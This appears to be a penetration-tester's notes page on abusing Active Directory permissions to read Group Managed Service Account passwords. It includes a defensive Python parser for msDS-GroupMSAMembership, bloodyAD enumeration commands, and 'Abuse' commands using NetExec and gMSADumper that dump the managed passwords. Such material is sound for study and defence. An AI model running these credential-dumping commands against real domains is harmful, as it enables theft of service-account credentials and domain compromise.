PRIMARY CATEGORY → DACL ABUSE

Theory

gMSA → Group Managed Service Accounts

This solution is to service accounts what LAPS is to the local administrator accounts of domain-joined machines.

It periodically generates random, complex passwords for the domain service accounts and stores them on the Domain Controllers.

A domain account can retrieve the password of a gMSA if it has the appropriate permissions over it. These can be found by listing the msDS-GroupMSAMembership attribute of the gMSA, whose value is a security descriptor: the principals holding an allow ACE in its DACL are the ones able to read the managed password.
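The following is an added example, not part of the original page and not code from bloodyAD, NetExec or gMSADumper. It parses a self-relative security descriptor of the kind stored in msDS-GroupMSAMembership and lists the SIDs holding an allow ACE, i.e. the principals that should appear on a gMSA's permission review. The descriptor is constructed inline (the domain SID S-1-5-21-1111-2222-3333 and the RIDs 1105 and 1106 are made up); a real value would come from the attribute read over LDAP.

```python
import struct

ACE_TYPE_NAMES = {0x00: "ACCESS_ALLOWED", 0x01: "ACCESS_DENIED"}
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
# Full-control mask; the value typically found in the ACEs of msDS-GroupMSAMembership
GENERIC_ALL_MASK = 0x000F01FF


def build_sid(identifier_authority, *sub_authorities):
    """Construct a binary SID (revision 1); used only to build the sample descriptor."""
    return (struct.pack("<BB", 1, len(sub_authorities))
            + identifier_authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in sub_authorities))


def build_sample_sd(sids, mask=GENERIC_ALL_MASK):
    """Construct a self-relative security descriptor whose DACL grants `mask` to each SID."""
    aces = b""
    for sid in sids:
        body = struct.pack("<I", mask) + sid                             # ACCESS_ALLOWED_ACE: Mask + Sid
        aces += struct.pack("<BBH", 0x00, 0x00, 4 + len(body)) + body    # ACE_HEADER: Type, Flags, Size
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces  # ACL: Rev, Sbz1, Size, Count, Sbz2
    # SECURITY_DESCRIPTOR_RELATIVE: Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, 0, 0, 0, 20)
    return header + acl


def parse_sid(data, offset):
    """Decode the binary SID at `offset` into S-1-... form; return (sid_string, byte_length)."""
    revision, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    sid = "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)
    return sid, 8 + 4 * count


def parse_dacl(sd):
    """Return the ACCESS_ALLOWED / ACCESS_DENIED ACEs of a self-relative security descriptor."""
    _rev, _sbz1, control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & SE_DACL_PRESENT) or off_dacl == 0:
        return []  # no DACL present: nobody has been granted anything
    _acl_rev, _acl_sbz1, _acl_size, ace_count, _acl_sbz2 = struct.unpack_from("<BBHHH", sd, off_dacl)
    aces = []
    pos = off_dacl + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_type in ACE_TYPE_NAMES:
            (mask,) = struct.unpack_from("<I", sd, pos + 4)
            sid, _ = parse_sid(sd, pos + 8)
            aces.append({"type": ACE_TYPE_NAMES[ace_type], "mask": mask, "sid": sid})
        pos += ace_size  # other ACE types (object ACEs, ...) are skipped by their declared size
    return aces


def principals_allowed_to_retrieve_password(sd):
    """SIDs holding an allow ACE in msDS-GroupMSAMembership: these can read the gMSA password."""
    return [ace["sid"] for ace in parse_dacl(sd) if ace["type"] == "ACCESS_ALLOWED"]


# Constructed sample input: two principals of a made-up domain are allowed to retrieve the password
SAMPLE_SD = build_sample_sd([
    build_sid(5, 21, 1111, 2222, 3333, 1105),
    build_sid(5, 21, 1111, 2222, 3333, 1106),
])
# Descriptor without a DACL, to show the empty case
EMPTY_SD = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE, 0, 0, 0, 0)

if __name__ == "__main__":
    for sid in principals_allowed_to_retrieve_password(SAMPLE_SD):
        print("allowed to retrieve managed password:", sid)
```

Resolving each SID to an account name is left to the directory (the `--resolve-sd` option of bloodyAD does this for you); the point of the parser is that the answer to "who can read this gMSA's password" is nothing more than the allow ACEs of this one attribute, which makes it a cheap thing to diff over time and alert on when it changes.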


Enumeration - UNIX-like

BloodyAD.py

Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt
Usage
python3 bloodyAD.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --dc-ip '<DC_IP>' get object '<TARGET_SERVICE_ACCOUNT>' --attr 'msDS-GroupMSAMembership' --resolve-sd

Abuse - UNIX-like

Netexec

nxc ldap <TARGET> --username '<USER>' --password '<PASSWD>' --gmsa

gMSADumper.py

Setup
git clone https://github.com/micahvandeusen/gMSADumper gMSADumper
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt
Usage
python3 gMSADumper.py --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>'

Resources

The Hacker Recipes: Read gMSA Password